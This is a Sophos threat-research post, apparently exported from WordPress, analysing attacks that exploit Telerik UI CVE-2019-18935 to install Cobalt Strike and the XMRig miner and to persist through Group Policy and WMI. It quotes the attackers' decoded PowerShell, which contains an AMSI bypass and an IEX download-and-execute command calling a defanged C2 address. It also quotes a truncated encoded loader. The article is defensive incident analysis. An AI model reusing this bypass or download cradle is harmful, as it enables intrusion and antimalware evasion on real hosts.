{"id":19344,"date":"2022-06-15T05:20:56","date_gmt":"2022-06-15T13:20:56","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2022\/06\/15\/news-13077\/"},"modified":"2022-06-15T05:20:56","modified_gmt":"2022-06-15T13:20:56","slug":"news-13077","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2022\/06\/15\/news-13077\/","title":{"rendered":"Telerik UI exploitation leads to cryptominer, Cobalt Strike infections"},"content":{"rendered":"

Credit to Author: Matt Wixey| Date: Wed, 15 Jun 2022 11:00:05 +0000<\/strong><\/p>\n

\n

Using a methodology first seen in 2020, an unknown threat actor has been exploiting a three-year-old bug in the Telerik UI web application framework to take control of web servers, installing Cobalt Strike beacons and other malware in the process.<\/p>\n

In the weeks following the initial, 2019 disclosure of the vulnerability, attackers scanned the internet for vulnerable applications. Many server admins were caught off guard by a rapid flurry of attacks that delivered cryptominers. But not all the vulnerable servers were hit in the initial wave; the bug was routinely exploited throughout 2020 and 2021<\/a> (notably by the Netwalker ransomware operators<\/a>, who we\u2019ve covered<\/a> before<\/a>) – and the Sophos Managed Threat Response team has intervened in several new attacks since the beginning of May.<\/p>\n

In the incidents we investigated, the threat actor exploited the vulnerability (designated CVE-2019-18935<\/a>) to deliver a Cobalt Strike beacon (in the form of a DLL payload) to disk, then used the beacon to execute encoded PowerShell commands, which downloaded more malware, and established persistence on the servers through some novel methods.<\/p>\n

These tactics closely resemble those used in a series of attacks two years ago, attributed at the time to a threat actor dubbed Blue Mockingbird. It\u2019s no secret, of course, that threat actors will often reuse tactics, techniques, and procedures (TTPs) and target known, unpatched vulnerabilities, rather than go to the trouble of developing new approaches.<\/p>\n

The attempted execution of PowerShell commands triggered Sophos behavioral-based detection rules, which allowed us to evict the threat actor and prevent the attacks from doing any more damage.<\/p>\n

CVE-2019-18935<\/h3>\n

Telerik UI for ASP.NET AJAX is a set of components and themes for building web applications, including a bunch of programmable objects that can manipulate how a web page works or looks. Some of those objects can behave like scripts or small programs, and the Telerik management interface gives the site\u2019s developers or managers the ability to upload new modules or other components on demand.<\/p>\n

The bug at work here, CVE-2019-18935, is a deserialization vulnerability affecting web applications using Telerik and running on Windows servers \u2013 specifically, in Telerik UI\u2019s RadAsyncUpload<\/strong> function, used to process file upload requests.<\/p>\n

Serialization is when a web application converts complex data structures, like objects, into a stream of bytes, which can then be stored on disk or sent over a network. Deserialization, as the name suggests, involves changing that byte stream back into the original object. But if a web application deserializes data from user input, an attacker can smuggle malicious code into the serialized object, or even replace the object altogether. Possible impacts of deserialization vulnerabilities include denial-of-service, authentication bypasses, and \u2013 as in this case \u2013 remote code execution. As a result, the National Vulnerability Database (NVD) determined that CVE-2019-18935 has a CVSS score of 9.8 (CRITICAL).<\/p>\n

The bug is a little more complex than it first appears, though. Serialization within the upload handler in Telerik UI is protected by encryption keys, and an attacker needs to know them before they can exploit the vulnerability. They can abuse earlier bugs in Telerik UI \u2013 CVE-2017-11317<\/a> and CVE-2017-11357<\/a> \u2013to do just that, although this requires finding a host that\u2019s still vulnerable. Or an attacker could get the keys through some other means \u2013 for example, exploiting another vulnerability in a web application.<\/p>\n

Once that\u2019s done, the attacker has to compile a malicious mixed-mode assembly<\/a> DLL – containing both managed and unmanaged code \u2013 which, after exploitation, is executed in the context of the w3wp.exe<\/strong> process, responsible for running web applications on Windows hosts.<\/p>\n

So there are a few prerequisites for this exploit chain: finding a vulnerable host; exploiting a five-year-old vulnerability to obtain the encryption keys (or getting them some other way); compiling the right kind of DLL; and then exploiting the deserialization bug. Sounds like a lot of effort!<\/p>\n

However, researchers released a public proof-of-concept exploit<\/a> in mid-December 2019, which does most of the heavy lifting. It contains code from another repository<\/a> to handle the encryption logic, and a batch file to compile the DLL, making it essentially \u2018point-and-shoot’ (an available Metasploit module<\/a> makes it even easier).<\/p>\n

Telerik issued a patch<\/a> for the vulnerability, but because the Telerik UI framework is usually embedded into custom-built, one-off web applications, it can be hard for the owners of the servers where those applications are running to figure out whether their unique application is vulnerable to the exploit before they fall victim to an attack.<\/p>\n

Attackers don’t reinvent the steal<\/h3>\n

The attacks observed by Sophos MTR appeared to use the proof-of-concept exploit script referenced above, with a Cobalt Strike beacon DLL used as a payload. One of the quirks of this exploit is that, when the attacker uploads the DLL to the server, it always ends up in the C:WindowsTemp<\/strong> directory on the targeted host, with a Unix timestamp as the filename \u2013 which allows us to find out exactly when the attackers exploited the bug.<\/p>\n

The Cobalt Strike payload communicates with a command-and-control server located in the Czech Republic, with the following beacon configuration:<\/p>\n

\"A<\/a><\/p>\n

Figure 1: The Cobalt Strike beacon configuration<\/em><\/p>\n

Following execution of the Cobalt Strike payload, the attackers then ran a Base64-encoded PowerShell command, to download and run additional malware from the C2 server.<\/p>\n

\"A<\/a>Figure 2: The decoded PowerShell commands<\/em><\/p>\n

In environments protected by Sophos, the PowerShell execution shown here triggers a behavioural-based detection rule, which terminates the malicious PowerShell process and opens a Sophos MTR case to investigate further.<\/p>\n

Our analysis of setup192.exe<\/strong> reveals that it spawns cmd.exe<\/strong> for self-injection and drops two further suspicious files \u2013 crby26td.exe<\/strong> and a.json<\/strong> – in C:WindowsTemp<\/strong>.<\/p>\n

crby26td.exe<\/strong> is XMRig Miner, a legitimate open-source cryptocurrency miner designed to mine for Monero, and a.json<\/strong> is a file containing configuration information for cryptomining:<\/p>\n

\"A<\/a>Figure 3: The contents of a.json, containing configuration details for the XMRig Miner malware<\/em><\/p>\n

The \u2018user\u2019 field above is the Monero wallet ID \u2013 but, due to the design of Monero, we can\u2019t view the balance of the wallet.<\/p>\n

Attackers love XMRig Miner, and we see it a lot<\/a> \u2013 often in conjunction with widespread vulnerabilities like Log4J<\/a> (CVE-2021-44228).<\/p>\n

Persistence via Group Policy Objects<\/h3>\n

A few days later, in an unrelated environment, the Sophos MTR team responded to an incident where a threat actor was performing lateral movement and establishing persistence via Active Directory GPOs.<\/p>\n

A GPO is a container for group policy settings, and attackers can leverage enumeration of GPOs<\/a> \u2013 which are, by default, readable by authenticated domain users \u2013 to identify opportunities for privilege escalation. However, GPOs can also be used to establish persistence and complement lateral movement, as in this case.<\/p>\n

After further investigation of the network, we identified that attackers had exploited an unprotected web server which was vulnerable to CVE-2019-18935. After gaining initial access, the threat actor pivoted from the compromised web server to unprotected Domain Controllers in order to plant the malicious GPO.<\/p>\n

\"A<\/a><\/p>\n

Figure 4: The attack chain observed by Sophos MTR<\/em><\/p>\n

The GPO in question was creating scheduled tasks with unique names, which ran only once, across workstations, resulting in encoded data \u2013 a hex-encoded cmd.exe<\/strong> command, together with Base64-encoded PowerShell – being written to the following registry key:<\/p>\n

HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionScheduleTaskCacheTasks{unique_task_name}<\/pre>\n
\"A<\/a><\/p>\n
Figure 5: The encoded malicious scheduled task in the registry<\/em><\/p>\n
We used a CyberChef recipe<\/a> to decode this data, resulting in:<\/p>\n
$a='msi';[Ref].Assembly.GetType('System.Management.Automation.A'+$a+'Utils').GetField('a'+$a+'InitFailed',  'NonPublic,Static').SetValue($null,$true);IEX ((new-object net.webclient).downloadstring('hxxp:\/\/212.192.241[.]155:8000\/a'))<\/pre>\n
This command uses a common Antimalware Scripting Interface (AMSI) bypass technique<\/a>; note the attacker\u2019s use of string concatenation (the $a<\/strong> variable) to bypass Windows Defender signatures designed to block this technique.<\/p>\n
hxxp[:]\/\/212.192.241[.]155:8000\/a<\/strong> is a remote PowerShell script, this time encoded with gunzip and XOR:<\/p>\n
$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(\"H4sIAAAAAAAAAOy9Wa\/qSrIu+rzrV8yHLa21xNo1wIAxR9rSNTYY444eTJ1SyRjjBtw3Y  [-truncated-]   q3f94xVr4oD97z0xm85f6tKh+Lyqqi6t93gML5LP4X98EPpf5971L\/3eXp5EPvVTX6eZfVa19rfwJCUODYO2EFAA==\"));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();<\/pre>\n
When decoded (see here<\/a> for a primer on decoding malicious PowerShell), the script loads a Cobalt Strike DLL into memory. As in the earlier incidents, XMRig Miner was then downloaded. We also observed an additional binary, tuh25o6n.exe<\/strong>, being dropped; this downloaded hxxp[:]\/\/212.192.241[.]155\/up\/setup.exe<\/strong> and, as before, saved it to either C:WindowsTempsetup192.exe<\/strong> or C:UsersPublicsetup192.exe<\/strong>.<\/p>\n
In addition to a scheduled task, the attacker installed a persistent Windows Management Instrumentation (WMI) ActiveScriptEvent consumer named WindowsUpdate<\/strong>, to download and execute malware from the C2 server at hxxp[:]\/\/212.192.241[.]155\/up\/setup.exe<\/strong>. Threat actors can use WMI ActiveScriptEvent consumers<\/a> to execute a predefined script upon the triggering of an event, and configure this behavior as either persistent, or a one-off. In this case, it wasn\u2019t clear what the event was, but it may have been the application of GPO settings (Event ID 1500), which from our observations coincided with the creation of malicious tasks.<\/p>\n
\"Screenshot<\/a><\/p>\n
Figure 6: The malicious WMI ActiveScriptEvent consumer<\/em><\/p>\n
Mocking Blue Mockingbird?<\/h3>\n
In May 2020, researchers reported<\/a> that a threat actor dubbed Blue Mockingbird was exploiting CVE-2019-18935 in order to install XMRig Miner and establish persistence using multiple techniques, including scheduled tasks.<\/p>\n
So far, so similar. But there are some key differences in the cases we observed. For instance, in the 2020 incidents, XMRig Miner was packaged as a DLL, and used as the primary payload, whereas we saw Cobalt Strike used initially, and XMRig downloaded later in the attack chain via an intermediary binary.<\/p>\n
Blue Mockingbird also used a COR_PROFILER COM<\/strong> hijack for persistence, remote scheduled tasks for lateral movement, and Juicy Potato<\/a> for privilege escalation (as well as Mimikatz to obtain credentials), whereas these techniques were absent in our investigations.<\/p>\n
Interestingly, the Blue Mockingbird C2 mechanism appeared to be experimental in 2020, with the threat actor trying out various tools, including reverse shells in PowerShell and DLL form. So it\u2019s possible that the threat actor we observed is a re-tooled Blue Mockingbird, with a refined infection chain and a (relatively) off-the-shelf C2 mechanism in the form of Cobalt Strike \u2013 or it could be a different threat actor, making their own improvements to the Blue Mockingbird methodology.<\/p>\n
Either way, it\u2019s clear that CVE-2019-18935 isn\u2019t going away. As shown in the Google Trends graph below, searches for \u2018CVE-2019-18935\u2019 peaked in late May 2020, around the time it was reported as being actively exploited by Netwalker and Blue Mockingbird. Activity then tapered off, leading to a lull between November 2021 and January 2022 \u2013 but there has been a recent uptick since then, which may be correlated with some of the attacks the Sophos MTR team has investigated.<\/p>\n
\"A<\/a><\/p>\n
Figure 7: Google searches for ‘CVE-2019-18935’ between December 2019 and June 2022<\/em><\/p>\n
Looking at our detections of XMRig Miner (in all attacks) between December 2021 and June 2022 makes for an interesting comparison: fairly low levels of activity until a significant spike in late March 2022, followed by sustained levels of higher activity throughout April and May.<\/p>\n
\"A<\/a>Figure 8: Sophos detections of XMRig Miner between December 2021 and May 2022<\/em><\/p>\n
Of course, not all attacks involving XMRig Miner also involve CVE-2019-18935 (and vice versa), and there are all sorts of possible explanations for the fluctuations seen in both graphs. What they do illustrate, however, is that while threat actors\u2019 interests in particular vulnerabilities and tools may vary in the short-term, they often return to tried and tested methodologies.<\/p>\n
Detection and guidance<\/h3>\n
Whether or not the threat actor in this case is Blue Mockingbird, there are three key learning points for organizations. The first is basic security hygiene: ensuring that you have robust ransomware and malware protection in place, and applying up-to-date patches to Internet-facing products and components such as Telerik UI. This can be difficult if your web application was developed some time ago, or by, for example, contracted developers. To check if you\u2019re vulnerable to CVE-2019-18935, there\u2019s a scanner for CVE-2019-18935<\/a>, including a Python script and an Nmap Scripting Engine (NSE) plugin \u2013 although, as always, exercise caution when using third-party scanners and tools.<\/p>\n
The second is that even relatively old vulnerabilities can be of significant interest to threat actors; just because a bug has dropped off the infosec news cycle, doesn\u2019t make it less impactful when exploited.<\/p>\n
And finally, these incidents demonstrate that threat actors\u2019 TTPs often evolve through gradual, incremental refinement, whether of their own approaches or someone else\u2019s. While brand-new vulnerabilities and novel techniques may grab the headlines \u2013 not without good reason \u2013 a successful infection may be the result of a few tweaks in an established attack chain. Threat actors, like everyone else, usually prefer to keep things simple.<\/p>\n
We reached out to Telerik to let them know that this vulnerability is still being exploited in the wild. They replied with advice they previously sent out to their customers in 2020: \u201cFixes were provided to our customers and partners in 2017 and 2019. To protect against this vulnerability, we recommend that you upgrade to R1 2020 (version 2020.1.114) or later. If you\u2019re unsure if this impacts you, go to this page<\/a>.\u201d Telerik also included links to their articles on CVE-2017-11317<\/a> and CVE-2019-18935<\/a>.<\/p>\n
Sophos endpoint products installed on web servers will detect the downloader setup192.exe<\/strong> as Troj\/Miner-AED<\/strong>, and the downloader tuh25o6n.exe<\/strong> as Troj\/DwnLd-ADF<\/strong>. The Cobalt Strike DLL will be detected as Mem\/Meter-G<\/strong>, and the Cobalt Strike payload executed in memory will be detected as Troj\/PShlSpy-A<\/strong> and ATK\/Cobalt-CP<\/strong>. XMRig Miner will be detected as a potentially unwanted application (PUA), and the associated configuration file as Coinminer Config<\/strong>. Additionally, behavioral detections such as Exec_30a<\/strong> will intercept and prevent the downloading and execution of binaries via PowerShell as observed here. Multiple GET requests to [HOST]\/Telerik.Web.UI.WebResource.axd?type=rau<\/strong> in your web server logs can indicate possible exploitation attempts.<\/p>\n
SophosLabs has posted IOCs relating to the samples analyzed in this report on our Github repository<\/a>.<\/p>\n
Acknowledgments<\/h3>\n
SophosLabs would like to acknowledge the contributions of Gabor Szappanos, Gabe Renfro, John Carlo Adriano, Aaron Sullivan, Chaz Denney, Colby Olinarez, and the rest of the Sophos MTR team to this report.<\/p>\n<\/p><\/div>\n
http:\/\/feeds.feedburner.com\/sophos\/dgdY<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"
<\/p>\n
Credit to Author: Matt Wixey| Date: Wed, 15 Jun 2022 11:00:05 +0000<\/strong><\/p>\n
Attacker targets bugs in a popular web application graphical interface development tool<\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10378,10377],"tags":[24291,15080,26555,26556,26557,11191,24552,18513,26558,16771,18493],"class_list":["post-19344","post","type-post","status-publish","format-standard","hentry","category-security","category-sophos","tag-cobalt-strike","tag-cryptomining","tag-cve-2017-11357","tag-cve-2017-1137","tag-cve-2019-18935","tag-powershell","tag-security-operations","tag-sophoslabs-uncut","tag-telerik","tag-threat-research","tag-xmrig"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/19344","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=19344"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/19344\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=19344"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=19344"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=19344"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}